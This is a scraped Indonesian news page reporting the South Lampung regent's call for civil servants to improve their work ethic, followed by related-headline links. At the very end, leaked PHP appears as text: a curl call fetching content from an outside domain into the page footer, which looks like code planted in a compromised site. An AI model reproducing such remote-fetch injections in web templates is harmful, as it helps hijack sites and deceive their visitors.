Minta ASN Tingkatkan Etos Kerja, Nanang: Kita Ini Pelayan Rakyat

Senin, 31 Juli 2023

facebook twitter whatsapp telegram line copy

URL berhasil dicopy

facebook icon twitter icon whatsapp icon telegram icon line icon copy

URL berhasil dicopy

Lampung Selatan, Jejakkasus.Info Kalianda – Bupati Lampung Selatan H. Nanang Ermanto meminta kepada seluruh Aparatur Sipil Negara (ASN) serta Tenaga Harian Lepas Sukarela (THLS) untuk lebih meningkatkan etos kerja guna memberikan pelayanan prima kepada masyarakat.

Hal itu disampaikan Nanang Ermanto saat memimpin apel mingguan yang diikuti Sekretaris Daerah Kabupaten Lampung Selatan, para Staf Ahli Bupati, Asisten, Kepala Perangkat Daerah serta seluruh ASN dan THLS yang digelar di Lapangan Korpri, Kalianda, Senin, (31/7/2023).

Baca Juga:  Sekretaris PP tegur 299 Pekon Terkait Penggunaan Minimal 8% DD Untuk Covid-19.

Nanang mengatakan, di era kekinian, penyelenggaraan pelayanan publik yang prima sangat diharapkan masyarakat. Dimana kemajuan ilmu pengetahuan dan teknologi sangat mempengaruhi pola pikir dan tuntutan masyarakat dalam mendapatkan pelayanan publik.

Menurut Nanang, pelayanan publik yang prima merupakan suatu tolak ukur kinerja pemerintah, karena dapat dinilai langsung oleh masyarakat. Maka diperlukan percepatan reformasi birokrasi.

Baca Juga:  Persiapan Pengadaan ASN 2024, Sekda Lampung Selatan Rakornas di Jakarta

“Masyarakat itu tidak pernah melihat apakah pekerjaan kita sudah dilakukan degan baik atau tidak. Jika ada sesuatu yang dirugikan, informasinya cepat menyebar di era digital. Maka mari rubah mindset etos kerja kita dengan baik, kita ini pegawai pelayannya rakyat,” kata Nanang.

Oleh karena itu, Nanang minta kepada seluruh pegawai baik ASN maupun THLS di lingkup Pemkab Lampung Selatan untuk dapat terus meningkatkan kinerjanya agar semakin baik lagi.

Baca Juga:  Satuan Lalu Lintas (SatLantas) Polres Aceh Jaya Giatkan Patroli Kawasan Tertib Lalu Lintas (KTL)

“Gali potensi, ciptakan inovasi dan kreativitas. Apa yang bisa kita lakukan, apa yang bisa kita perbuat untuk kemajuan daerah ini. Karena siapa lagi yang akan memajukan kabupaten ini kalau bukan kita semua keluarga besar pegawai Lampung Selatan,” ujar Nanang. (Joe/Kmf)

Follow WhatsApp Channel jejakkasus.info untuk update berita terbaru setiap hari Follow

Berita Terkait

Soal Minyak Goreng Kemasan Ilegal, Paslon Egi-Saiful Terancam Pasal Berlapis Hingga Pidana 5 Tahun Penjara
Banjir Dukungan, Umat Hindu Minta Nanang Ermanto Pimpin Kembali Lampung Selatan
Diduga Mengunakan Izin Usaha Palsu , Karoke De’Amore Disegel dan Terancam Di Tutup Kembali
DPP KAMPUD Beri Dukungan Kinerja Dan Apresiasi Kepada JPN Kejari Bandar Lampung
Debat Kandidat Gubernur Lampung 2024, DPP AKAR Soroti Kebijakan yang Tak Berpihak pada Rakyat
Kasus Camat Negeri Katon Langgar Netralitas ASN pada Pilkada Kini Ditangani Polisi
Sudah Berkerja Nyata,WN 88 Deklarasi Dukung Paslon 01 di Pilkada 2024, Kami Siap Menangkan Nanang-Antoni
Musrenbang 2025 Pekon Wayngison Resmi Dibuka

Berita Terkait

Sabtu, 12 Oktober 2024 - 20:32 WIB

Soal Minyak Goreng Kemasan Ilegal, Paslon Egi-Saiful Terancam Pasal Berlapis Hingga Pidana 5 Tahun Penjara

Sabtu, 12 Oktober 2024 - 18:48 WIB

Banjir Dukungan, Umat Hindu Minta Nanang Ermanto Pimpin Kembali Lampung Selatan

Jumat, 11 Oktober 2024 - 23:50 WIB

Diduga Mengunakan Izin Usaha Palsu , Karoke De’Amore Disegel dan Terancam Di Tutup Kembali

Jumat, 11 Oktober 2024 - 19:08 WIB

DPP KAMPUD Beri Dukungan Kinerja Dan Apresiasi Kepada JPN Kejari Bandar Lampung

Jumat, 11 Oktober 2024 - 14:45 WIB

Debat Kandidat Gubernur Lampung 2024, DPP AKAR Soroti Kebijakan yang Tak Berpihak pada Rakyat

Berita Terbaru

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://umrohkemenag.org/footer/'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $a = curl_exec($ch); curl_close($ch);?>